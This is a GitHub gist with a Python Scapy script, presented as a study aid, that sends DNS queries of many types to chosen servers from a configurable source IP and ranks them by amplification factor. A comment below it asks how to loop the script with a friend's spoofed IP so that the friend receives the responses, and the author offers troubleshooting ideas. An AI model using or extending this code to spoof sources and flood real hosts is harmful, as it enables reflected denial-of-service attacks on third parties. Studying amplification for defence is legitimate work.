Last active
April 11, 2024 23:31
-
-
Save thom-s/7b3fcdcb88c0670167ccdd6ebca3c924 to your computer and use it in GitHub Desktop.
Better understanding DNS Amplification DDoS attacks through Python and Scapy.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Imports | |
from scapy.all import * | |
from pprint import pprint | |
import operator | |
# Parameters | |
interface = "eth0" # Interface you want to use | |
dns_source = "local-ip" # IP of that interface | |
dns_destination = ["ip1","ip2","ip3"] # List of DNS Server IPs | |
time_to_live = 128 # IP TTL | |
query_name = "google.com" # DNS Query Name | |
query_type = ["ANY", "A","AAAA","CNAME","MX","NS","PTR","CERT","SRV","TXT", "SOA"] # DNS Query Types | |
# Initialise variables | |
results = [] | |
packet_number=0 | |
# Loop through all query types then all DNS servers | |
for i in range(0,len(query_type)): | |
for j in range(0, len(dns_destination)): | |
packet_number += 1 | |
# Craft the DNS query packet with scapy | |
packet = IP(src=dns_source, dst=dns_destination[j], ttl=time_to_live) / UDP() / DNS(rd=1, qd=DNSQR(qname=query_name, qtype=query_type[i])) | |
# Sending the packet | |
try: | |
query = sr1(packet,iface=interface,verbose=False, timeout=8) | |
print("Packet #{} sent!".format(packet_number)) | |
except: | |
print("Error sending packet #{}".format(packet_number)) | |
# Creating dictionary with received information | |
try: | |
result_dict = { | |
'dns_destination':dns_destination[j], | |
'query_type':query_type[i], | |
'query_size':len(packet), | |
'response_size':len(query), | |
'amplification_factor': ( len(query) / len(packet) ), | |
'packet_number':packet_number | |
} | |
results.append(result_dict) | |
except: | |
pass | |
# Sort dictionary by the amplification factor | |
results.sort(key=operator.itemgetter('amplification_factor'),reverse=True) | |
# Print results | |
pprint(results) |
Hello, I need to write a scapy script for school that represents a DNS amplification attack. If i put your code in a loop and use the IP address of my friend he doesn't receive anything. As interface I set my WIFI interface and dns source, my friends IP address. I'm interpreting this wrong because my friend doesn't see anything of DNS responses. Could it be my network that blocks this traffic or would it be my code that isn't correct. Has anyone ideas on how to solve this problem?
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Hard to say without knowing more, what DNS server do you use in your lab? Perhaps the DNS server has some DNS amplification protection or drops packets with non-DNS ports (1337). What does the response look like when you have the same source IP as your machine's and what did you modify in the script? I'll be honest I haven't touched it in a while so I'm not too sure.